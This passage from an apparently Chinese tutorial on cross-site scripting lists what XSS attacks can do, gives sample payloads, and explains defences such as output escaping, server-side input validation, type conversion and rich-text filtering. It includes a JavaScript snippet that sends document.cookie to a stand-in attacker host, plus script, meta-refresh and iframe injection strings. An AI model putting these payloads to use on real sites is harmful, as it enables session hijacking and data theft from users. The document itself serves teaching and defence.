XSS攻击

XSS攻击能做些什么:

1.窃取cookies，读取目标网站的cookie发送到黑客的服务器上，如下面的代码：
 var i=document.createElement("img");
 document.body.appendChild(i);
 i.src = "http://www.hackerserver.com/?c=" + document.cookie;
2.读取用户未公开的资料，如果：邮件列表或者内容、系统的客户资料，联系人列表等等。

3.前面两个是读的操作，其实还可进行写的操作，比如说：删除用户的博客，转发指定的微博，向用户的联系人发送带有恶意代码的信息，进行下一步的传播。

xss攻击的条件:

实施XSS攻击需要具备两个条件：
一、需要向web页面注入恶意代码；
二、这些恶意代码能够被浏览器成功的执行。

看看常见的恶意字符XSS 输入：

1.XSS 输入通常包含 JavaScript 脚本，如弹出恶意警告框：<script>alert("XSS");</script>
2.XSS 输入也可能是 HTML 代码段，譬如：

(1).网页不停地刷新 <meta http-equiv="refresh" content="0;">
(2).嵌入其它网站的链接 <iframe src=http://xxxx width=250 height=250></iframe>

xss 检测代码:

htmlspecialchars

xss攻击防御:

一、输出检查
根据XSS攻击的条件，我们可以对用户输出进行检查，使用系统的安全函数进行转义将数据和代码分开，根据不同的场景使用正确的安全函数，否则效果适得其反。

二、输入检查
通常用于检测用户输入的数据是否符合预期的格式，比如日期格式，Email格式，电话号码格式等等；输入检查必须在服务端进行；当然为了提高用户体验和减轻服务端的资源客户端也要进行一次检查，但服务端检查始终是必须的，有个别程序员却调过来了认为客户端检查是必须的，服务端检查是可选的，其实这是错误的逻辑，因为客户端很容易被黑客绕过。

三、转换为安全的类型
类型检查或者类型转换到安全的类型，比如：int,float,枚举类型等等，如在前面一个例子中将id转换为int类型即可<div><img src="/images/handler.ashx?id=<%=  int.Parse(Request.QueryString["id"]) %>" /></div>
$aa = 'xxxxx'; (int)$aa;

四、智能过滤恶意代码
通过正确的输出检查我们能够将数据安全的输出到浏览器中，但有些时候会带来不好的用户体验，当用户通过html编辑器提交的数据
 显然这个肯定不是用户想要的展示结果，所以我们要对这种富文本进行过滤，把恶意代码摘除；如一些敏感关键字：javascript、vbscript,<script>等等，那么是不是把这些关键词摘除掉就高枕无忧了呢？答案是否定的。